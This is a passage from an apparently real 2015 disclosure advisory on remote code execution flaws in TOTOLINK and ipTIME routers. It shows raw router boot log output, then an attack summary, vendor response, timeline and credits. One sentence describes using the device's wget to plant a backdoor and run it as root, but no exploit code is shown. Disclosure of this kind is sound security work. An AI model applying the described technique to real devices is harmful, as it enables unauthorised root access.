ON All LED Dynamic Channel Search for wlan0 is OFF start_signal => plantynet_sync Do start_signal => plantynet_sync SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed Reaped 354 iptables: Bad rule (does a matching rule exist in that chain?) ez_ipupdate callback --> time_elapsed: 1 Run DDNS by IP change: / 192.168.2.1 Burst DDNS Registration is denied: iptime -> now:26 Led Silent Callback Turn ON All LED /proc/sys/net/ipv4/tcp_syn_retries: cannot create - - - ---> Plantynet Event : 00000003 - - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE [sending the DHCP request] [01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1 00:01:03 miniupnpd[370]: received signal 15, good-bye Reaped 392 Reaped 318 Reaped 314 Reaped 290 Reaped 288 Reaped 268 Reaped 370 Reaped 367 - - - ---> PLANTYNET_SYNC_FREE_DEVICE Restarting system. Booting... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Reboot Result from Watchdog Timeout! - - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz) Delay 1 second till reset button Magic Number: raw_nv 00000000 Check Firmware(05020000) : size: 0x001ddfc8 ----> [...] An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root. ## Vendor Response Due to "un-ethical code" found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted in regard of this case, but ipTIME was contacted in April 2015 concerning the first RCE. ## Report Timeline * Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in ipTIME products. * Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products. * Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products. * Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and EX750 routers. * Jul 13, 2015: Updated firmwares confirmed vulnerable. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories/2015-totolink-0x00.txt https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/